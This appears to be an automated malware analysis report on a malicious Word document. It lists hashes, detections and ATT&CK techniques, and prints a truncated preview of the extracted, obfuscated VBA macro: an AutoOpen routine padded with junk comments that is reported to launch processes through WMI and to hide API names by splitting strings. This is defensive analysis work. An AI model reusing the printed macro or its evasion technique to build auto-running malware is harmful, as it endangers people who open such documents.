Office (OLE) malware analysis — malicious · ca6f15f7b6e3f9cc

MALICIOUS

Office (OLE)

139.4 KB Created: 2019-05-03 12:46:00 Authoring application: Microsoft Office Word First seen: 2020-01-07

MD5: 214ff8cf0d914b74bfdc5fc771be8cfa SHA-1: 494eaf3a292506386b97145abd6e541227968555 SHA-256: ca6f15f7b6e3f9ccc958aeb6f5adb5b262b5fb1237c3f93d4b12bf102e413447

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

This Office document contains a high-confidence detection for VBA macros, specifically an AutoOpen macro that utilizes GetObject and CreateObject to launch the Win32_Process.Create method via WMI. The script also shows obfuscation by splitting the 'winmgmts:' string. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload.

Heuristics 8

ClamAV: Doc.Malware.Sagent-6961489-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-6961489-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8957 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8957 bytes
SHA-256: `dee0424136e9ece7f100919393e002b15d6858d55de6b70c8aee377ba70892c8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "i4775_1" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "t870371" Attribute VB_Base = "0{7A24E517-5945-4E44-BA2E-D83EB7FB6510}{3083BCAC-3F02-4E1B-93B3-7A3A08A25229}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "q195028" Attribute VB_Name = "i95407" Attribute VB_Name = "r105375" Attribute VB_Name = "h_82006" Attribute VB_Base = "0{BA76CE68-1E81-4F53-92DB-EB08601CFE07}{663FFD15-E62F-4983-A8A7-3C74811A86AB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "P829996" Function h23_29(X08110_5) With l83639 '.u0185198 = (Log(E7810677) + 143575590 * L90255) '.w33213 = (Log(a980813) + 644438578 * j83_6869) '.I7_857 = (Log(r6705_19) + 456622172 * H733599) '.m77475 = (Log(r1620695) + 363532037 * S08324) End With With J_715__7 '.K0457315 = (Log(T673832) + 512454582 * b346405) '.d4363410 = (Log(X51725) + 816329316 * d27738) '.c02995 = (Log(Q2_5084) + 584561268 * z673266) '.n_9190 = (Log(E468161) + 794594767 * w3_91499) End With With S60783_4 '.M66661 = (Log(B__543) + 150566433 * f4_086_) '.O37636 = (Log(p4110293) + 615561529 * E852_13) '.L7_615 = (Log(d6961550) + 879755822 * H371_544) '.h6__28 = (Log(a155982) + 815641020 * R_4166) End With Set h23_29 = CVar(X08110_5) With u60_7025 '.V72697_3 = (Log(A_3__283) + 386936509 * N76_03) '.M4841426 = (Log(t322__5) + 303132629 * J788492_) '.u5_3964 = (Log(j08386) + 435712841 * j77673) '.i1_432_ = (Log(Z405679) + 151380712 * b5_2_9) End With With C2920__ '.o7_952_ = (Log(C400773) + 993230100 * I62029) '.H0015_ = (Log(A47027) + 697335416 * m82138) '.B61890_2 = (Log(R610_547) + 825492041 * w699042) '.z32356 = (Log(N678305) + 872613838 * k9880451) End With End Function Sub autoopen() On Error Resume Next With l037_502 '.R44428 = (Log(P68_7685) + 405846352 * X3162__) '.n8067559 = (Log(S47897) + 6016402 * j07431) '.P93522 = (Log(d7342206) + 102557616 * r64_2_) '.F2575051 = (Log(w23482_9) + 652790702 * z1360_6) End With With S9952047 '.D72_2675 = (Log(s3937856) + 612120789 * H06198) '.k79948_4 = (Log(r7035_0) + 137596869 * z18660) '.j0494674 = (Log(Z7841_9) + 55895129 * T62702_8) '.O59276 = (Log(O57205) + 643625693 * f_98681) End With With U53303 '.m0191_ = (Log(v_0479_) + 417481928 * D52502) '.G85233 = (Log(A312__8) + 648569143 * H_52019) '.V_4_00_9 = (Log(q97729) + 774758285 * K196_310) '.r5466468 = (Log(M13167) + 838249951 * P418168) End With Call E0484000 With u_88__4 '.Z_6359 = (Log(v657_745) + 77999753 * d346512) '.B8359636 = (Log(G0622_) + 288489601 * r558460) '.X124_2 = (Log(R19549) + 155639836 * h1226239) '.i_00_61 = (Log(z0_53_) + 649181350 * A68395) End With With s_399863 '.Y02_033 = (Log(h020456) + 322164306 * p259534) '.v8542_90 = (Log(w95_7_4) + 405072418 * u48676) '.I99756 = (Log(M6_0773_) + 92469226 * H092089) '.z097888 = (Log(S5_6799) + 437291550 * R195_21) End With With C_0_6_93 '.H_985192 = (Log(m43781) + 795427723 * u78_1849) '.J9073_4 = (Log(f736295) + 800426904 * f967423) '.n12478 = (Log(s918493) + 8363732 * G6270457) '.J75_6357 = (Log(j94471) + 890462035 * z47_52) End With End Sub Attribute VB_Name = "K0_112" Function E0484000() On Error Resume Next With G214862 '.b547814 = (Log(Y7198282) + 42574356 * i_71032_) '.q5659460 = (Log(S2__274) + 454186019 * J8201793) '.w48_827 = (Log(q236756_) + 665420251 * z89692) '.O364226 = (Log(A3_1075) + 563093067 * c67723) End With With i22701 '.M482_6 = (Log(r790_929) + 832142048 * K23_231) ' ... (truncated)

SHA-256: dee0424136e9ece7f100919393e002b15d6858d55de6b70c8aee377ba70892c8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "i4775_1"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "t870371"
Attribute VB_Base = "0{7A24E517-5945-4E44-BA2E-D83EB7FB6510}{3083BCAC-3F02-4E1B-93B3-7A3A08A25229}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "q195028"

Attribute VB_Name = "i95407"

Attribute VB_Name = "r105375"

Attribute VB_Name = "h_82006"
Attribute VB_Base = "0{BA76CE68-1E81-4F53-92DB-EB08601CFE07}{663FFD15-E62F-4983-A8A7-3C74811A86AB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P829996"
Function h23_29(X08110_5)
   With l83639
'.u0185198 = (Log(E7810677) + 143575590 * L90255)
'.w33213 = (Log(a980813) + 644438578 * j83_6869)
'.I7_857 = (Log(r6705_19) + 456622172 * H733599)
'.m77475 = (Log(r1620695) + 363532037 * S08324)
End With
   With J_715__7
'.K0457315 = (Log(T673832) + 512454582 * b346405)
'.d4363410 = (Log(X51725) + 816329316 * d27738)
'.c02995 = (Log(Q2_5084) + 584561268 * z673266)
'.n_9190 = (Log(E468161) + 794594767 * w3_91499)
End With
   With S60783_4
'.M66661 = (Log(B__543) + 150566433 * f4_086_)
'.O37636 = (Log(p4110293) + 615561529 * E852_13)
'.L7_615 = (Log(d6961550) + 879755822 * H371_544)
'.h6__28 = (Log(a155982) + 815641020 * R_4166)
End With
Set h23_29 = CVar(X08110_5)
   With u60_7025
'.V72697_3 = (Log(A_3__283) + 386936509 * N76_03)
'.M4841426 = (Log(t322__5) + 303132629 * J788492_)
'.u5_3964 = (Log(j08386) + 435712841 * j77673)
'.i1_432_ = (Log(Z405679) + 151380712 * b5_2_9)
End With
   With C2920__
'.o7_952_ = (Log(C400773) + 993230100 * I62029)
'.H0015_ = (Log(A47027) + 697335416 * m82138)
'.B61890_2 = (Log(R610_547) + 825492041 * w699042)
'.z32356 = (Log(N678305) + 872613838 * k9880451)
End With
End Function
Sub autoopen()
On Error Resume Next
   With l037_502
'.R44428 = (Log(P68_7685) + 405846352 * X3162__)
'.n8067559 = (Log(S47897) + 6016402 * j07431)
'.P93522 = (Log(d7342206) + 102557616 * r64_2_)
'.F2575051 = (Log(w23482_9) + 652790702 * z1360_6)
End With
   With S9952047
'.D72_2675 = (Log(s3937856) + 612120789 * H06198)
'.k79948_4 = (Log(r7035_0) + 137596869 * z18660)
'.j0494674 = (Log(Z7841_9) + 55895129 * T62702_8)
'.O59276 = (Log(O57205) + 643625693 * f_98681)
End With
   With U53303
'.m0191_ = (Log(v_0479_) + 417481928 * D52502)
'.G85233 = (Log(A312__8) + 648569143 * H_52019)
'.V_4_00_9 = (Log(q97729) + 774758285 * K196_310)
'.r5466468 = (Log(M13167) + 838249951 * P418168)
End With
Call E0484000
   With u_88__4
'.Z_6359 = (Log(v657_745) + 77999753 * d346512)
'.B8359636 = (Log(G0622_) + 288489601 * r558460)
'.X124_2 = (Log(R19549) + 155639836 * h1226239)
'.i_00_61 = (Log(z0_53_) + 649181350 * A68395)
End With
   With s_399863
'.Y02_033 = (Log(h020456) + 322164306 * p259534)
'.v8542_90 = (Log(w95_7_4) + 405072418 * u48676)
'.I99756 = (Log(M6_0773_) + 92469226 * H092089)
'.z097888 = (Log(S5_6799) + 437291550 * R195_21)
End With
   With C_0_6_93
'.H_985192 = (Log(m43781) + 795427723 * u78_1849)
'.J9073_4 = (Log(f736295) + 800426904 * f967423)
'.n12478 = (Log(s918493) + 8363732 * G6270457)
'.J75_6357 = (Log(j94471) + 890462035 * z47_52)
End With
End Sub

Attribute VB_Name = "K0_112"
Function E0484000()
On Error Resume Next
   With G214862
'.b547814 = (Log(Y7198282) + 42574356 * i_71032_)
'.q5659460 = (Log(S2__274) + 454186019 * J8201793)
'.w48_827 = (Log(q236756_) + 665420251 * z89692)
'.O364226 = (Log(A3_1075) + 563093067 * c67723)
End With
   With i22701
'.M482_6 = (Log(r790_929) + 832142048 * K23_231)
'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.